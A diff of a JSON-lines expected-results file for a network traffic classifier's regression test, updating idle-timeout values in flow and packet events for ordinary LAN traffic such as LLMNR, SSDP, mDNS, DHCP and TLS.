+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1470104391208,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391208,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0a70AAC4G7uxA6b2AwKhzCABQwa1HQonO9XiAjYAQAVdRKwAAAQEFCvV4gIz1eICN"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1470104391254,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104391254,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD+KsU6wAgEMLGawAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} 00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} @@ -321,7 +321,7 @@ 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1470104397807,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104397807,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClrzIAAAERVEPAqAUw7\/\/\/+sIlB2wAkY1JTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104398314,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoA95AAEAGLsvAqAUQROn9hdFlAFAG4xw4xV6fSlAUEAE+LgAA8Q52cgJF"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1470104398314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104398314,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoA95AAEAGLsvAqAUQROn9hdFlAFAG4xw4xV6fSlAUEAE+LgAA8Q52cgJF"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1470104398832,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104398832,"pkt":"AQBeAAD7ZMwunDzJCABFAABEo69AAP8RMRXAqAVA4AAA+xTpFOkAMOS\/AAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} @@ -362,12 +362,12 @@ 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1470104401902,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104401902,"pkt":"\/\/\/\/\/\/\/\/vO57DLPeCABFAAFIg+0AAEAR9bgAAAAA\/\/\/\/\/wBEAEMBNDMlAQEGANPiBnoAAAAAAAAAAAAAAAAAAAAAAAAAALzuewyz3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLWY3Y2EwZjU3MTI3MGM1MmQ3CQEhAwYPHDM6O\/8A"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104401904,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1470104401904,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104401904,"pkt":"\/\/\/\/\/\/\/\/ABNyFooyCABFAABEAABAAEARLl07eNDU\/\/\/\/\/4AAB5sAMADiZERZY1RjNFBBQUJQY0dWdVluUnpBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402238,"flow_last_seen":1470104402238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104402238,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1470104402238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104402238,"pkt":"ABAj4ACgYMVHBbyMCABFAABAGihAAEAGJuTAqAUQwKhzS9F5AbtwBJ91AAAAALAC\/\/\/WVQAAAgQFtAEDAwUBAQgKGg9qPQAAAAAEAgAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1470104402239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104402239,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XnKmfzXcASfdoASFtC0YwAAAgQFtAEBBAIBAwMH"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1470104402239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104402239,"pkt":"ABAj4ACgYMVHBbyMCABFAAAosclAAEAGj1rAqAUQwKhzS9F5AbtwBJ92ypn82FAQIADsBQAAyQ4pxaWW"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402238,"flow_last_seen":1470104402238,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104402238,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1470104402238,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104402238,"pkt":"ABAj4ACgYMVHBbyMCABFAABAGihAAEAGJuTAqAUQwKhzS9F5AbtwBJ91AAAAALAC\/\/\/WVQAAAgQFtAEDAwUBAQgKGg9qPQAAAAAEAgAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1470104402239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104402239,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XnKmfzXcASfdoASFtC0YwAAAgQFtAEBBAIBAwMH"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1470104402239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104402239,"pkt":"ABAj4ACgYMVHBbyMCABFAAAosclAAEAGj1rAqAUQwKhzS9F5AbtwBJ92ypn82FAQIADsBQAAyQ4pxaWW"} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1470104402518,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":177,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":177,"pkt_l4_len":143,"thread_ts_msec":1470104402518,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAACjAABAAEARAqHAqHcB\/\/\/\/\/94dFi4Aj\/bjAAFSEAABAAZMXgzqA2UABQAHMzAwTU5BVAAHAA82LjM1LjEgKHN0YWJsZSkACAAITWlrcm9UaWsACgAEf5YkAAALAAlBWFJKLVg2U0cADAAGUkI0NTBHAA4AAQEADwAQIAGwMAIUAQAAAAAAAAAAAQAQABNldGhlcjItbWFzdGVyLWxvY2Fs"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":180000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -399,7 +399,7 @@ 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1470104406818,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104406818,"pkt":"MzMAAQACvO57DLPeht1gAAAAACwRAf6AAAAAAAAAvu57\/\/4Ms97\/AgAAAAAAAAAAAAAAAQACAiICIwAsfJ0LBzLAAAEADgABAAEa5zhrJpdxkWmjAAgAAgEaAAYABAAXABg="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD0soU6wAgjSs9jgAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1470104407128,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407128,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LSAAAAER5cXAqAUv4AAA\/NLKFOsAIEGyPY4AAAABAAAAAAAABlJPX1gxQwAA\/wAB"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1470104407686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407686,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0WZNAAEAG2QnAqAUQROn9hdFtAFBAFGHVDj7nf4AREAGvkQAAAQEIChoPf3zPHNz0"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1470104407686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104407686,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0WZNAAEAG2QnAqAUQROn9hdFtAFBAFGHVDj7nf4AREAGvkQAAAQEIChoPf3zPHNz0"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1470104408049,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104408049,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQADyPsU6wAmMfpTdAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104408049,"flow_last_seen":1470104408049,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104408049,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":51451,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} @@ -418,10 +418,10 @@ 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104409586,"flow_last_seen":1470104409586,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104409586,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":56043,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1014,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD0rIU6wAgVxmmDQAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1470104409685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104409685,"pkt":"AQBeAAD8PKn0WgOECABFAAA0H6kAAAER9H\/AqAPs4AAA\/NrrFOsAIGYJpg0AAAABAAAAAAAABmlzYXRhcAAAAQAB"} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104410885,"flow_last_seen":1470104410885,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1470104410885,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 